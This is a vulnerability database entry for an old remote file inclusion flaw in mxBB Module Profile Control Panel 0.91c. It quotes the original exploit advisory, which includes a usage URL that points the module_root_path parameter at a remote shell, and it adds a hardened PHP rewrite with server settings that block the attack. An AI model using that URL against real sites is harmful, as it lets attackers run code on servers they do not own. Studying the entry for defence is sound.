vendor: mxBB Module Profile Control Panel
by: Bugfound3R: bd0rk || SOH-Crew
CVSS: 8.8 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: mxBB Module Profile Control Panel
Affected Version From: 0.91c
Affected Version To: 0.91c
Patch Exists: YES
Related CWE: N/A
CPE: mxbb-module-profile-control-panel
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability

A vulnerability in mxBB Module Profile Control Panel 0.91c allows remote attackers to include arbitrary files via a URL in the module_root_path parameter to includes/profilcp_constants.php.

Mitigation:

Upgrade mxBB Module Profile Control Panel 0.91c to the latest version.

Exploit-DB raw data:

###############################################################################
##                                                                           ##
## mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability ##
##                                                                           ##
## Bugfound3R: bd0rk || SOH-Crew                                             ##
##                                                                           ##
## Website: www.soh-crew.it.tt                                               ##
##                                                                           ##
## Greetz: str0ke, Lu7k, TheJT, Natok                                        ##
##                                                                           ##
###############################################################################

Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=70

==> Vulnerable Code in profilcp_constants.php <==

Code: include_once($module_root_path . 'includes/lang_extend_mac.'.$phpEx);

Usage: http://[y0uRSiTe]/[direct0ry]/includes/profilcp_constants.php?module_root_path=http://Sh3LL?

# milw0rm.com [2006-12-09]
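The include shown in the advisory trusts $module_root_path, which a client can supply as a request parameter (via register_globals or a similar GET/POST merge) and point at a remote URL. Below is an added, hardened rewrite of that include; it is not the mxBB project's code. It assumes the front controller defines the guard constant IN_PHPBB, that the module root is the parent directory of this file, and that $phpEx is the usual phpBB extension variable.

```php
<?php
// Added example, not part of the original advisory or of mxBB itself.
// Hardened replacement for:
//   include_once($module_root_path . 'includes/lang_extend_mac.'.$phpEx);

// 1. Refuse direct web access. IN_PHPBB is assumed (hypothetical here) to be
//    defined only by the legitimate front controller that includes this file.
if (!defined('IN_PHPBB')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access not permitted');
}

// 2. Derive the module root from the file system, never from request input.
//    The original value came from a variable that the client could set, which
//    is what turned the include into a remote file inclusion.
$module_root_path = dirname(__DIR__) . '/';
$phpEx = 'php';

// 3. Defence in depth: resolve the final path and verify it stays inside the
//    module root before handing it to include_once. realpath() rejects URLs
//    and non-existent files, and the prefix check blocks '../' traversal.
function safe_module_include(string $root, string $relative): void
{
    $base   = realpath($root);
    $target = realpath($root . $relative);
    $prefix = $base === false ? '' : $base . DIRECTORY_SEPARATOR;
    if ($base === false || $target === false
        || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('Refusing to include file outside module root');
    }
    include_once $target;
}

safe_module_include($module_root_path, 'includes/lang_extend_mac.' . $phpEx);
```

On the server side, setting allow_url_include=Off (PHP 5.2 and later) and allow_url_fopen=Off removes the ability of any include to fetch remote code, which limits this whole class of bug even where the application is not patched.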